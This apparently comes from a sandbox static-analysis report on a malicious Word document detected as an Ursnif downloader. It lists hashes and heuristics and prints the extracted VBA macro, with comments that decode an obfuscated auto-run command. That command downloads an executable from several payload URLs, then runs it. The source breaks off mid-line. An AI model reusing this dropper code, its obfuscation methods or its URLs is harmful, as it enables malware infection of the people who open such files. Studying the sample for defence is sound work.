Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1ce1209b507ae76b…

MALICIOUS

Office (OLE)

70.2 KB Created: 2018-09-05 21:11:00 Authoring application: Microsoft Office Word First seen: 2019-08-04
MD5: 2b493e60af112d2d9983685b81bdb477 SHA-1: 6c869bddce4b720c0a7e43535a3bffca0fe56d88 SHA-256: 1ce1209b507ae76b3f83ff6d382024f08b38ff7c4572baee00575c8fbed5cebc
182 Risk Score

Heuristics 5

  • ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Document_open calls VBA.Shell with a command line concatenated from several string-fragment functions; the window-style argument (38 - 38) evaluates to 0 (vbHide), so the spawned process runs without a visible window.
  • Document_Open macro high OLE_VBA_DOCOPEN
    The ThisDocument module defines a Document_open handler, which Word runs automatically when the document is opened with macros enabled — no further user interaction is required.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Note that the download URLs this sample actually uses are not in this list: they are assembled at runtime inside the macro from caret-obfuscated, reversed string fragments (see FrujmjatSTf and KcRqmOwqf in the extracted script below) and only become visible after decoding.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5715 bytes
SHA-256: 359df57a0afc6916a5ff468324cafe3d0016b783762c14f4f2b4f8d67e62ff01
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "juKdplMZIzhiw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' ThisDocument module (VB_Base = "1Normal.ThisDocument"). Document_open is
' Word's auto-exec event, so this Sub runs as soon as the document is opened
' with macros enabled; no further user interaction is needed.
Private Sub Document_open()
' Error handler for the whole Sub: every runtime error is ignored and
' execution continues with the next statement, so the junk Hour calls below
' never abort the macro (a failing Shell call would also go unnoticed).
On _
Error _
Resume _
Next
   ' Junk statements: Hour() is called on a non-date string and the result is
   ' discarded; any type-mismatch error is swallowed by the handler above.
   ' They apparently only pad the code to defeat signature matching.
   Hour "167849998" + "iqzsr"
   Hour "304829387" + "qHLNqVjhzXCAd" + "l" + "zC"
   Hour "OLPh" + "tGDTLw"
' The only statement that matters: the command line is concatenated from
' several string-fragment functions and executed via VBA.Shell.
'   - hmiUoMzji, FrujmjatSTf and KcRqmOwqf are defined in module bMPkGzo below.
'   - lIR, KFiUzjF, MAKSWPcVW, Pkpri, jHXBSuBoKpZZO and WOtLibCitDI are not
'     visible in this excerpt — presumably further fragment functions in
'     modules not shown (with On Error Resume Next, an undefined name would
'     presumably just contribute an empty string). Word's CleanString() is
'     applied to the first fragment (it removes non-printing characters).
'   - The second argument, 38 - 38 = 0, is the window style vbHide, so the
'     spawned cmd.exe runs with no visible window.
VBA.Shell CleanString(lIR) + KFiUzjF + MAKSWPcVW + hmiUoMzji + FrujmjatSTf + KcRqmOwqf + Pkpri + jHXBSuBoKpZZO + WOtLibCitDI, 38 - 38
   ' More junk padding after the real payload, same pattern as above.
   Hour "3354" + "CFiQI"
   Hour "wJBaqzZnq" + "415455341" + "ScomrG" + "Ku"
   Hour "2063" + "121890588" + "3712" + "wKQmisWD"
   Hour "7831" + "bvdqsNbKAPd"
End Sub



Attribute VB_Name = "bMPkGzo"
' Returns the first chunk of the obfuscated cmd.exe command line. Every
' fragment is littered with carets (^) — cmd.exe's escape character, which it
' strips while parsing — and the PowerShell part is stored backwards, so it
' has to be reversed again before it can run. The reversal step is not in
' this excerpt (presumably in one of the fragment functions not shown).
' The Hour calls are junk padding, exactly as in Document_open.
Function hmiUoMzji()

On _
Error _
Resume _
Next
Hour "2341" + "LzH" + "CCpR" + "IpSEv"
   Hour "Xv" + "pzE" + "Pof" + "ffHpCrqPNUZz"
' Chr(0+3+3+0+28) = Chr(34) = double quote. Caret-stripped this reads
'   cmd /V:O/C"set dY56= ...
' i.e. start cmd.exe with (apparently abbreviated) delayed variable expansion
' and begin assigning the reversed script to the environment variable dY56.
ihQiFMwfq = "cmd" + " " + "/" + "V^:^" + "O" + "/C" + Chr(0 + 3 + 3 + 0 + 28) + "^s" + "e^t ^d" + "^Y56= ^" + " " + " ^  ^"
Hour "274929317" + "9582"
   Hour "9538" + "53923137" + "308026666" + "307043729"
' Caret-stripped and read right-to-left:  l;break;}catch{}}
' (the tail of the PowerShell download loop).
sdauGCCJ = " ^ " + "     " + "   ^  " + "^}" + "^}^{h" + "c^t" + "ac};k^a" + "er^b;l"
Hour "320716294" + "10486307" + "Owz" + "mvI"
   Hour "122149262" + "334940253"
   Hour "IaIcQUNOP" + "96921372" + "aqLLuC" + "JCPUivkl"
   Hour "AufthmVObF" + "vPMlEHTmd"
' Right-to-left:  adFile($OAo, $lFl);Invoke-Item $lF
' -> the download call and the execution of the dropped file.
UZORPsGtKFY = "Fl$ me" + "t^" + "I^-^e" + "k^ovn^" + "I" + ";)lF^" + "l$" + " ,^" + "o^AO$" + "(e^l^i" + "^F^da"
Hour "AaGl" + "pVHkUktF"
   Hour "l" + "YvHo" + "222667853" + "VPHzK"
   Hour "ZYCn" + "h" + "lGaLiiYqk" + "UQPG"
' Right-to-left:  exe';foreach($OAo in $rkH){try{$rpp.Downlo
' -> loops over the URL list $rkH, trying each until one download succeeds.
iGtiCqSaw = "^o" + "^ln^w^" + "oD.p^pr" + "$" + "{^y" + "rt^{)" + "H" + "kr$^" + " n^i^ o" + "AO$(^hc" + "^a^ero" + "^f" + ";^'ex^e"
Hour "nQGo" + "K"
   Hour "mnwoEwXfN" + "FujAIRTu"
   Hour "q" + "ukwZoHq" + "242763421" + "TR"
' Right-to-left:  '634';$lFl=$env:public+'\'+$Bnd+'.
' -> the dropped file path is %PUBLIC%\<$Bnd>.exe (with $Bnd = '634').
oYCcPuum = "^.^'^+" + "dn^" + "B$^+^'" + "\^'" + "^+ci" + "l^bu" + "^p:vn" + "^e$^" + "=^l" + "^Fl" + "^$;'4^3" + "6" + "^'^"
' The fragments are joined in source order. The return value is assigned
' here, in the middle of the function; the trailing Hour calls are junk.
hmiUoMzji = ihQiFMwfq + sdauGCCJ + UZORPsGtKFY + iGtiCqSaw + oYCcPuum
   Hour "6135" + "LMDUwbzJFt" + "195149412" + "3395"
   Hour "GiTsM" + "S" + "LVRiCsn" + "YlZu"
End Function
' Returns the second chunk of the command line: the reversed, caret-obfuscated
' download URL list and the start of the $Bnd assignment. Caret-stripped and
' read right-to-left, the five fragments appear to give (in reversed order):
'   bpaSaC       beriaplanet.com/
'   AdYLsj       nqoWmK8pa@http://cra
'   jibDUcwGTn   ftww.pl//inOeT43ed1
'   qiElmYPww    @http://infoprohealth.com/bDJDZPp
'   IbhzducSjrD  9VY'.Split('@');$Bnd =
' i.e. an '@'-separated string of payload URLs that is split into the array
' the download loop in hmiUoMzji iterates over. The head of the first URL
' presumably comes from KcRqmOwqf (the next function). None of these URLs
' appears in the report's "Embedded URL" list, because they exist only after
' decoding. Hour calls are junk padding, as elsewhere.
Function FrujmjatSTf()

On _
Error _
Resume _
Next
Hour "455787440" + "112521891" + "900" + "asTIUXVH"
   Hour "TZWp" + "Hn"
' Right-to-left:  9VY'.Split('@');$Bnd =
IbhzducSjrD = " = ^" + "dnB$^;)" + "^'@^" + "'(" + "^t^i^l" + "p" + "^S.'YV9"
Hour "353270049" + "189291364"
   Hour "4786" + "ZSDnBkUTT"
   Hour "6502" + "351561333" + "1325" + "317133549"
' Right-to-left:  @http://infoprohealth.com/bDJDZPp
qiElmYPww = "^pP" + "Z^D^J^D" + "^b/^moc" + ".^ht" + "la^eh" + "^or" + "^pofn" + "i//:p" + "t^t^h^@" + "^"
Hour "sz" + "wzQpOhliSRJwd" + "phckfTA" + "52619659"
' Right-to-left:  ftww.pl//inOeT43ed1
jibDUcwGTn = "1de3^4" + "T" + "^" + "eOn^i" + "/" + "/^l^p." + "w^w^tf"
Hour "knQZ" + "38337714" + "RSzZPpGHj" + "NnkkW"
   Hour "rhd" + "fTNfstQuFbR" + "k" + "29"
' Right-to-left:  nqoWmK8pa@http://cra
AdYLsj = "^arc//^" + ":ptth^@" + "^" + "ap" + "^8" + "^Km^W^" + "oqn"
Hour "1255" + "ZOw" + "1652" + "avI"
   Hour "w" + "70226976" + "zjXfM" + "446925218"
   Hour "QULiwviwK" + "wktWvqN"
   Hour "NkLvzcZEPGfjQ" + "146610539"
   Hour "4618" + "510542551"
' Right-to-left:  beriaplanet.com/
bpaSaC = "/m^oc^." + "^t^en^a" + "l^pair^" + "e" + "b"
' Fragments are joined in source order; the return value is assigned here and
' the remaining Hour calls are junk.
FrujmjatSTf = IbhzducSjrD + qiElmYPww + jibDUcwGTn + AdYLsj + bpaSaC
   Hour "AsMUIVFQkowl" + "wBzBn" + "uuWl" + "VVMK"
   Hour "oQRU" + "mObN" + "m" + "wiH"
   Hour "2445" + "b"
   Hour "31859079" + "WDhlkB" + "P" + "Z"
End Function
Function KcRqmOwqf()

On _
Error _
Resume _
Next
Hour "K" + "wp"
   Hour "IupQRuEjMzz" + "kPzihUjAIaw"
ODRIclvqn = "^i^s//^" + ":pt^t" + "^" + "h@^pV2" + "v^" + "D^d^x" + "^g/moc" + "^.^l" + "^ai"
Hour "PQAWX" + "32036101" + "WQjaOdbbX" + "OwmjwfizqJH"
   Hour "129" + "37934661"
   Hour "r" + "7189" + "F" + "4997"
HUCmd = "rot^i^" + "d" + "eonoci/" + "/" + "^:pt^" + "th^"
Hour "itL" + "JICSk"
   Hour "wzMKWJ" + "299367834" + "bzi" + "425724729"
   Hour "5954" + "f" + "85895799" + "rtJo"
YJKvFWmihfV = "@Q^8" + "^3ktHF/" + "^" + "edar^g" + "^pu"
Hour "hwiQbnfZDZcUZZ" + "sc"
   Hour "GGZlB" + "QZNDiPV" + "Ykv" + "wwKCk"
wYXRqoHrWWk = "/t" + "n^e^t" + "noc" + "^-^pw/m" + "
... (truncated)